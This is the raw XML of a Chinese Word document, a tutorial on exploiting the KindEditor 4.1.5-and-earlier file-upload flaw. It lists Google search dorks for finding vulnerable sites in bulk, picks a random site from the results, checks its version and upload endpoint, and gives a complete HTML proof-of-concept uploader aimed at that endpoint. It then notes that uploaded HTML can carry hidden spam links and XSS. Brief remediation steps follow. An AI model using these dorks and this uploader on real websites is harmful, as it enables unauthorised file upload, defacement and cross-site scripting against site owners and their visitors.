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84" w:afterAutospacing="false" w:lineRule="atLeast" w:line="18"/>
        <w:ind w:left="0" w:right="960"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:color w:val="0099cc"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pP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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>编辑器漏洞之kindeditorkindeditor&lt;=4.1.5上传漏洞</w:t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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实战</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:bookmarkStart w:id="1" w:name="0x00 漏洞描述"/>
    <w:bookmarkStart w:id="2" w:name="0x01 批量搜索"/>
    <w:bookmarkEnd w:id="1"/>
    <w:bookmarkEnd w:id="2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style2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single" w:sz="4" w:space="3" w:color="eeeeee"/>
        </w:pBdr>
        <w:spacing w:before="210" w:beforeAutospacing="false" w:after="192" w:afterAutospacing="false" w:lineRule="atLeast" w:line="15"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>0x01 批量搜索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92" w:afterAutospacing="false" w:lineRule="atLeast" w:line="19"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr/>
      </w:pP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t>找漏洞最必要的还是批量，借助谷歌。批量可以节省大部分的时间。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Fonts w:ascii="微软雅黑" w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:color w:val="ff0000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:color w:val="ff0000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>inurl:/examples/uploadbutton.html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Fonts w:ascii="微软雅黑" w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:color w:val="ff0000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:color w:val="ff0000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>inurl:/php/upload_json.php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Fonts w:ascii="微软雅黑" w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:color w:val="ff0000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:color w:val="ff0000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>inurl:/asp.net/upload_json.ashx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Fonts w:ascii="微软雅黑" w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:color w:val="ff0000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:color w:val="ff0000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>inurl://jsp/upload_json.jsp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Fonts w:ascii="微软雅黑" w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:color w:val="ff0000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:color w:val="ff0000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>inurl://asp/upload_json.asp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Fonts w:ascii="微软雅黑" w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:color w:val="ff0000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pP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  <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
        </w:rPr>
        <w:t>我们以其中一条为例进行谷歌搜索一下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/>
      </w:pP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drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5342255" cy="2490470"/>
            <wp:effectExtent l="0" t="0" r="6985" b="8890"/>
            <wp:docPr id="1026" name="图片 2" descr="IMG_25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2255" cy="24904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br/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t>以其中一条语法搜索的</w:t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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果</w:t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br/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="3" w:name="0x02 漏洞条件"/>
    <w:bookmarkEnd w:id="3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style2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single" w:sz="4" w:space="3" w:color="eeeeee"/>
        </w:pBdr>
        <w:spacing w:before="210" w:beforeAutospacing="false" w:after="192" w:afterAutospacing="false" w:lineRule="atLeast" w:line="15"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>0x02 漏洞条件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92" w:afterAutospacing="false" w:lineRule="atLeast" w:line="19"/>
        <w:ind w:left="0" w:right="0"/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</w:pP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t>要想挖掘漏洞一定要有一个可以产生漏洞的条件。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92" w:afterAutospacing="false" w:lineRule="atLeast" w:line="19"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr/>
      </w:pP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t>1.首先一定要看脚本语言，对症下药。kindeditor编辑器支持php/asp/jsp/asp.net。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/asp/upload_json.asp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/asp.net/upload_json.ashx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/jsp/upload_json.jsp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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:hint="default"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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/php/upload_json.php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92" w:afterAutospacing="false" w:lineRule="atLeast" w:line="19"/>
        <w:ind w:left="0" w:right="0"/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</w:pP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t>检查的目的就是验证文件 upload_json.* 存在不存在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92" w:afterAutospacing="false" w:lineRule="atLeast" w:line="19"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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t>2.查看可目录变量是否存在那种脚本上传漏洞</w:t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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。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kindeditor/asp/upload_json.asp?dir=file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kindeditor/asp.net/upload_json.ashx?dir=file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kindeditor/jsp/upload_json.jsp?dir=file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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:hint="default"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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kindeditor/php/upload_json.php?dir=file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92" w:afterAutospacing="false" w:lineRule="atLeast" w:line="19"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr/>
      </w:pP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t>根据web容器选择合适的payload。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="4" w:name="0x03 漏洞复现"/>
    <w:bookmarkEnd w:id="4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style2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single" w:sz="4" w:space="3" w:color="eeeeee"/>
        </w:pBdr>
        <w:spacing w:before="210" w:beforeAutospacing="false" w:after="192" w:afterAutospacing="false" w:lineRule="atLeast" w:line="15"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>0x03 漏洞复现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92" w:afterAutospacing="false" w:lineRule="atLeast" w:line="19"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr/>
      </w:pP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t>1.Google hacking搜索漏洞点。以其中一条语法为例</w:t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br/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drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5369560" cy="914400"/>
            <wp:effectExtent l="0" t="0" r="10160" b="0"/>
            <wp:docPr id="1027" name="图片 3" descr="IMG_25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69560" cy="914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92" w:afterAutospacing="false" w:lineRule="atLeast" w:line="19"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr/>
      </w:pP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t>2.这么多网站随便点一个。</w:t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drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5306060" cy="978535"/>
            <wp:effectExtent l="0" t="0" r="12700" b="12065"/>
            <wp:docPr id="1028" name="图片 4" descr="IMG_25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06060" cy="9785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br/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t>。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92" w:afterAutospacing="false" w:lineRule="atLeast" w:line="19"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr/>
      </w:pP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t>3.查看版本。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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:hint="default"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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http://www.xxx.com/kindeditor/kindeditor.js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92" w:afterAutospacing="false" w:lineRule="atLeast" w:line="19"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr/>
      </w:pP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br/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drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5273675" cy="950595"/>
            <wp:effectExtent l="0" t="0" r="14605" b="9525"/>
            <wp:docPr id="1029" name="图片 5" descr="IMG_26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3675" cy="9505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br/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t>很显然，4.1.4版本，在我们的掌控中。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92" w:afterAutospacing="false" w:lineRule="atLeast" w:line="19"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr/>
      </w:pP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t>4.验证文件 upload_json.* 是否存在</w:t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br/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t>这里可以通过分析网站结构来查看脚本语言，我这里用的插件</w:t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br/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drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5241290" cy="1007110"/>
            <wp:effectExtent l="0" t="0" r="1270" b="13970"/>
            <wp:docPr id="1030" name="图片 6" descr="IMG_26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41290" cy="10071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br/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t>可以看到web服务器是IIS，那就猜想asp的站</w:t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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t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drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5282565" cy="718185"/>
            <wp:effectExtent l="0" t="0" r="5715" b="13334"/>
            <wp:docPr id="1031" name="图片 7" descr="IMG_26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82565" cy="7181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br/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t>很明显，存在。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92" w:afterAutospacing="false" w:lineRule="atLeast" w:line="19"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr/>
      </w:pP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t>5.</w:t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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用</w:t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t>前辈创造的poc。这里需要修改&lt;script&gt;…&lt;script&gt;以及url : 的内容,根据实际情况修改.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&lt;html&gt;&lt;head&gt;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&lt;title&gt;Uploader&lt;/title&gt;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&lt;script src="http://www.xxx.com/kindeditor//kindeditor.js"&gt;&lt;/script&gt;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&lt;script&gt;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KindEditor.ready(function(K) {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var uploadbutton = K.uploadbutton({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button : K('#uploadButton')[0],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fieldName : 'imgFile',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url : 'http://www.xxx.com/kindeditor/jsp/upload_json.jsp?dir=file',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afterUpload : function(data) {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if (data.error === 0) {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var url = K.formatUrl(data.url, 'absolute');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K('#url').val(url);}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},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});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uploadbutton.fileBox.change(function(e) {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uploadbutton.submit();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});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});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&lt;/script&gt;&lt;/head&gt;&lt;body&gt;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&lt;div class="upload"&gt;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&lt;input class="ke-input-text" type="text" id="url" value="" readonly="readonly" /&gt;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&lt;input type="button" id="uploadButton" value="Upload" /&gt;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&lt;/div&gt;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&lt;/body&gt;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7f7f7"/>
        <w:spacing w:before="0" w:beforeAutospacing="false" w:after="192" w:afterAutospacing="false" w:lineRule="atLeast" w:line="19"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:hint="default"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="style98"/>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:hint="default"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:color w:val="dd1144"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="f7f7f7"/>
        </w:rPr>
        <w:t>&lt;/html&gt;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92" w:afterAutospacing="false" w:lineRule="atLeast" w:line="19"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr/>
      </w:pP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t>6.做一个html，用浏览器打开看一下。</w:t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br/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drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5285105" cy="774065"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3175"/>
            <wp:docPr id="1032" name="图片 8" descr="IMG_26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85105" cy="7740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br/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t>7.这里呢要配合一下抓包，需要看一下返回地址。我上传一个txt文件，看一下</w:t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br/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drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5285740" cy="2258060"/>
            <wp:effectExtent l="0" t="0" r="2540" b="12700"/>
            <wp:docPr id="1033" name="图片 9" descr="IMG_26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85740" cy="22580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92" w:afterAutospacing="false" w:lineRule="atLeast" w:line="19"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr/>
      </w:pP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t>8.我们访问一下文件看看。</w:t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br/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drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5334000" cy="810895"/>
            <wp:effectExtent l="0" t="0" r="0" b="12065"/>
            <wp:docPr id="1034" name="图片 10" descr="IMG_26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34000" cy="810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92" w:afterAutospacing="false" w:lineRule="atLeast" w:line="19"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr/>
      </w:pP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t>成功了。当然这了可以传很多格式，上边有介绍。比如这里传一个html里面可以嵌套暗链接地址以及嵌套xss。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="5" w:name="0x04 漏洞修复"/>
    <w:bookmarkEnd w:id="5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style2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single" w:sz="4" w:space="3" w:color="eeeeee"/>
        </w:pBdr>
        <w:spacing w:before="210" w:beforeAutospacing="false" w:after="192" w:afterAutospacing="false" w:lineRule="atLeast" w:line="15"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>0x04 漏洞修复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92" w:afterAutospacing="false" w:lineRule="atLeast" w:line="19"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr/>
      </w:pP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t>1.直接删除upload_json.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="style88"/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t>和file_manager_json.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92" w:afterAutospacing="false" w:lineRule="atLeast" w:line="19"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr/>
      </w:pP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19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>2.升级kindeditor到最新版本</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="6" w:name="0x05 总结"/>
    <w:bookmarkEnd w:id="6"/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92" w:afterAutospacing="false" w:lineRule="atLeast" w:line="19"/>
        <w:ind w:left="0" w:right="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00000000"/>
  </w:font>
  <w:font w:name="Consolas">
    <w:altName w:val="Consolas"/>
    <w:panose1 w:val="020b0609020002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3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qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="0" w:beforeAutospacing="true" w:after="0" w:afterAutospacing="true"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
      <w:b/>
      <w:kern w:val="44"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="0" w:beforeAutospacing="true" w:after="0" w:afterAutospacing="true"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
      <w:b/>
      <w:kern w:val="0"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:val="en-US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01">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style101"/>
    <w:uiPriority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jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style94">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style94"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="0" w:beforeAutospacing="true" w:after="0" w:afterAutospacing="true"/>
      <w:ind w:left="0" w:right="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="style88">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style88"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="style85">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style85"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000ff"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="style98">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style98"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20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jpe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customXml" Target="../customXml/item1.xml"/><Relationship Id="rId14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Words>539</Words>
  <Pages>1</Pages>
  <Characters>1746</Characters>
  <Application>WPS Office</Application>
  <DocSecurity>0</DocSecurity>
  <Paragraphs>65</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1805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2020-05-22T13:13:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <lastModifiedBy>ELE-AL00</lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-11T03:48:23Z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  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>636a41f842374a729cd93d0df6e69b00</vt:lpwstr>
  </property>
</Properties>
</file>